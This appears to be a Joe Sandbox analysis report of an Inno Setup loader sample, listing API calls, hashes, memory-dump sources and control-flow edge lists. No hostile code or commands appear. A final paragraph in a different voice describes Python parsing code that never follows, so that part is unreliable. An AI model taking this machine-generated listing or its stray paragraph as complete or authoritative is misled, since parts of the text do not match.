                                                                              • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                              • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                              • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                              • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                              • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                              • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02142344), ref: 0040966C
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(0002042A,000000FC,00409918), ref: 0040A148
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • DestroyWindow.USER32(0002042A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3757039580-3001827809
                                                                              • Opcode ID: 92d7a146f7fa7ea583be229cf1972f4387f7e731d45899e9009fd1a518b8a977
                                                                              • Instruction ID: f6a9afe5b3848034850d92184c83b7d566fc641e007638e18ad9d31f508a71de
                                                                              • Opcode Fuzzy Hash: 92d7a146f7fa7ea583be229cf1972f4387f7e731d45899e9009fd1a518b8a977
                                                                              • Instruction Fuzzy Hash: 3B411071600204DFD710EBA9EE86B9977A4EB45304F10467EF514B73E2C7B89811CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                              • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                              • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                              • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                              • SetWindowLongA.USER32(0002042A,000000FC,00409918), ref: 0040A148
                                                                                • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000), ref: 00409A28
                                                                                • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90), ref: 00409A5C
                                                                              • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                              • DestroyWindow.USER32(0002042A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                              • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                              • API String ID: 3586484885-3001827809
                                                                              • Opcode ID: a64027cc69530ce26e0d020b421cb23cd984c73ff13cd53596b8d38fe4c4ed4c
                                                                              • Instruction ID: bf8877be64b1eb53a955be5febe4cb156f3d413c702a3b20994545be7baf65d7
                                                                              • Opcode Fuzzy Hash: a64027cc69530ce26e0d020b421cb23cd984c73ff13cd53596b8d38fe4c4ed4c
                                                                              • Instruction Fuzzy Hash: 75411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000,00409A77), ref: 00409A14
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90,00000000), ref: 00409A28
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                              • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02142344,00409A90), ref: 00409A5C
                                                                                • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02142344), ref: 0040966C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                              • String ID: D
                                                                              • API String ID: 3356880605-2746444292
                                                                              • Opcode ID: 752074f715f169f8c9b0a2dfdb1d62babdf7ca20371da5ab86507c15e851728d
                                                                              • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                              • Opcode Fuzzy Hash: 752074f715f169f8c9b0a2dfdb1d62babdf7ca20371da5ab86507c15e851728d
                                                                              • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                              Control-flow Graph

                                                                              control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 730355536-0
                                                                              • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                              • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: 025cb7c8070ceb0a973f57dc2423f3e96cefce6b80174f3a3145c26c436c6efd
                                                                              • Instruction ID: 436c98ae07f88f71ec52beeb6e72a39fdb1c754e3b127fd60db974180cd34f4e
                                                                              • Opcode Fuzzy Hash: 025cb7c8070ceb0a973f57dc2423f3e96cefce6b80174f3a3145c26c436c6efd
                                                                              • Instruction Fuzzy Hash: 7541AC30600200DFC715EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: .tmp$y@
                                                                              • API String ID: 2030045667-2396523267
                                                                              • Opcode ID: cf567291c84692d100e5ec609b282d55b3c5af0b5f3d357f2e8f357a6d06844b
                                                                              • Instruction ID: effdcd9541676c6323f3fad609c54d18bb0bf767b5f2530b550772909ae59cb2
                                                                              • Opcode Fuzzy Hash: cf567291c84692d100e5ec609b282d55b3c5af0b5f3d357f2e8f357a6d06844b
                                                                              • Instruction Fuzzy Hash: 1F418D70610204DFC715EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: .tmp
                                                                              • API String ID: 1375471231-2986845003
                                                                              • Opcode ID: 7ba2b511fbcbba0bdafc57409f78771f2ffb69bdc1885ec5b7c8c3418ce725e0
                                                                              • Instruction ID: 229665e4fb482f752e04f7b041ef1ce89d659938bfc828767b82506ffacbf3f4
                                                                              • Opcode Fuzzy Hash: 7ba2b511fbcbba0bdafc57409f78771f2ffb69bdc1885ec5b7c8c3418ce725e0
                                                                              • Instruction Fuzzy Hash: 7C213774A04208ABDB05EFA1C8429DFB7B9EF88304F50457BE901B73C2DA7C9E059A65

                                                                               Control-flow Graph (edge list; the rendered graph marks each block as Executed or Not Executed)
                                                                              control_flow_graph 337 407749-40774a 338 4076dc-4076e6 WriteFile 337->338 339 40774c-40776f 337->339 341 4076e8-4076ea call 40748c 338->341 342 4076ef-4076f2 338->342 340 407770-407785 339->340 345 407787 340->345 346 4077f9 340->346 341->342 343 407700-407704 342->343 344 4076f4-4076fb call 4073ec 342->344 344->343 349 40778a-40778f 345->349 350 4077fd-407802 345->350 351 40783b-40783d 346->351 352 4077fb 346->352 355 407803-407819 349->355 357 407791-407792 349->357 350->355 353 407841-407843 351->353 352->350 356 40785b-40785c 353->356 355->356 367 40781b 355->367 358 4078d6-4078eb call 407890 InterlockedExchange 356->358 359 40785e-40788c 356->359 360 407724-407741 357->360 361 407794-4077b4 357->361 382 407912-407917 358->382 383 4078ed-407910 358->383 376 407820-407823 359->376 378 407890-407893 359->378 363 407743 360->363 364 4077b5 360->364 361->364 368 407746-407747 363->368 369 4077b9 363->369 372 4077b6-4077b7 364->372 373 4077f7-4077f8 364->373 374 40781e-40781f 367->374 368->337 375 4077bb-4077cd 368->375 369->375 372->369 373->346 374->376 375->353 379 4077cf-4077d4 375->379 380 407824 376->380 381 407898 376->381 378->381 379->351 388 4077d6-4077de 379->388 385 407825 380->385 386 40789a 380->386 381->386 383->382 383->383 389 407896-407897 385->389 390 407826-40782d 385->390 387 40789f 386->387 391 4078a1 387->391 388->340 400 4077e0 388->400 389->381 390->391 393 40782f 390->393 394 4078a3 391->394 395 4078ac 391->395 397 407832-407833 393->397 398 4078a5-4078aa 393->398 394->398 399 4078ae-4078af 395->399 397->351 397->374 398->399 399->387 401 4078b1-4078bd 399->401 400->373 401->381 402 4078bf-4078c0 401->402
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                              • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                              • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                              • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                               Control-flow Graph (edge list; the rendered graph marks each block as Executed or Not Executed)
                                                                              control_flow_graph 403 401fd4-401fe6 404 401fe8 call 401918 403->404 405 401ffb-402010 403->405 409 401fed-401fef 404->409 407 402012-402017 RtlEnterCriticalSection 405->407 408 40201c-402025 405->408 407->408 410 402027 408->410 411 40202c-402032 408->411 409->405 412 401ff1-401ff6 409->412 410->411 413 402038-40203c 411->413 414 4020cb-4020d1 411->414 417 40214f-402158 412->417 415 402041-402050 413->415 416 40203e 413->416 418 4020d3-4020e0 414->418 419 40211d-40211f call 401ee0 414->419 415->414 420 402052-402060 415->420 416->415 422 4020e2-4020ea 418->422 423 4020ef-40211b call 402f54 418->423 427 402124-40213b 419->427 425 402062-402066 420->425 426 40207c-402080 420->426 422->423 423->417 429 402068 425->429 430 40206b-40207a 425->430 432 402082 426->432 433 402085-4020a0 426->433 435 402147 427->435 436 40213d-402142 RtlLeaveCriticalSection 427->436 429->430 434 4020a2-4020c6 call 402f54 430->434 432->433 433->434 434->417 436->435
                                                                              APIs
                                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                              • String ID:
                                                                              • API String ID: 296031713-0
                                                                              • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                              • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                              • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                              • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                               Control-flow Graph (edge list; the rendered graph marks each block as Executed or Not Executed)
                                                                              control_flow_graph 439 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLibraryLoadMode
                                                                              • String ID:
                                                                              • API String ID: 2987862817-0
                                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                               Control-flow Graph (edge list; the rendered graph marks each block as Executed or Not Executed)
                                                                              control_flow_graph 443 40762c-40764a ReadFile 444 407663-40766a 443->444 445 40764c-407650 443->445 446 407652-40765a GetLastError 445->446 447 40765c-40765e call 40748c 445->447 446->444 446->447 447->444
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastRead
                                                                              • String ID:
                                                                              • API String ID: 1948546556-0
                                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
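The control_flow_graph lines in the function entries above are the edge lists behind the rendered graphs: each basic block appears as a decimal id followed by its hex address range (a single address for one-instruction blocks), any API name or `call <addr>` annotation is attached to the block it follows, and edges are written `src->dst`. The Python below is an added example, not part of Joe Sandbox or of this report; it parses that format and answers what a triage usually asks of such a graph: which blocks lead from the function entry to a given API call, and where the function exits. It assumes (the report does not document this) that the first listed block without a predecessor is the function entry, falling back to the first listed block when every block has one, as in the WriteFile graph that loops back to its first block. The sample input is the ReadFile graph copied from above.

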